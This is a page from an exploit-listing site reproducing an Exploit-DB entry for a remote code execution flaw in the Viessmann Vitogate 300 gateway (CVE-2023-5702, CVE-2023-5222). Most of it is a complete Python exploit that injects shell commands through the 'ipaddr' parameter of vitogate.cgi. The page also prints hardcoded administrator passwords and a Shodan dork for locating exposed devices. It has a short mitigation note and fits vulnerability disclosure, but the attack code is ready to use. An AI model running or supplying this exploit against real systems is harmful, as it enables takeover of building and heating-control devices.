Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Viessmann Vitogate 300 - exploit.company
header-logo
Suggest Exploit
vendor:
Vitogate 300
by:
ByteHunter
6.1
CVSS
HIGH
Remote Code Execution (RCE)
78
CWE
Product Name: Vitogate 300
Affected Version From: Up to 2.1.3.0
Affected Version To: 2.1.3.0
Patch Exists: NO
Related CWE: CVE-2023-5702 & CVE-2023-5222
CPE: a:viessmann:vitogate:2.1.3.0
Metasploit:
Other Scripts:
Platforms Tested:
2023

Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)

The Viessmann Vitogate 300 with versions up to 2.1.3.0 is vulnerable to remote code execution. By sending a crafted request to the target device, an attacker can execute arbitrary commands on the system. This vulnerability has been assigned CVE-2023-5702 & CVE-2023-5222.

Mitigation:

Update to version 2.1.4.0 or later to mitigate this vulnerability. Additionally, restrict network access to the device to trusted sources only.
Source

Exploit-DB raw data:

#- Exploit Title: Viessmann Vitogate 300 <= 2.1.3.0 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:'Vitogate 300'
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: versions up to 2.1.3.0
#- Tested on: 2.1.1.0
#- CVE : CVE-2023-5702 & CVE-2023-5222


import argparse
import requests

def banner():
    banner = """
    ╔═══════════════════════════════════╗
             CVE-2023-5702   
           Vitogate 300 RCE
           Author: ByteHunter      
    ╚═══════════════════════════════════╝
    """

    print(banner)


def send_post_request(target_ip, command, target_port):
    payload = {
        "method": "put",
        "form": "form-4-7",
        "session": "",
        "params": {
            "ipaddr": f"1;{command}"
        }
    }

    headers = {
        "Host": target_ip,
        "Content-Length": str(len(str(payload))),
        "Content-Type": "application/json"
    }

    url = f"http://{target_ip}:{target_port}/cgi-bin/vitogate.cgi"


    response = requests.post(url, json=payload, headers=headers)

    if response.status_code == 200:
        print("Result:")
        print(response.text)
    else:
        print(f"Request failed! status code: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="Vitogate 300 RCE & Hardcoded Credentials")
    parser.add_argument("--target", required=False, help="Target IP address")
    parser.add_argument("--port", required=False, help="Target port",default="80")
    parser.add_argument("--command", required=False, help="Command")
    parser.add_argument("--creds", action="store_true", help="Show hardcoded credentials")

    args = parser.parse_args()

    if args.creds:
        print("Vitogate 300 hardcoded administrative accounts credentials")
        print("Username: vitomaster, Password: viessmann1917")
        print("Username: vitogate, Password: viessmann")
    else:
        target_ip = args.target
        target_port = args.port
        command = args.command

        if not (target_ip and command):
            print("Both --target and --command options are required.\nor use --creds option to see hardcoded Credentials.")
            return

        send_post_request(target_ip, command,target_port)

if __name__ == "__main__":
    banner()
    main()

Navigation

Suggest Exploit

Services By CQR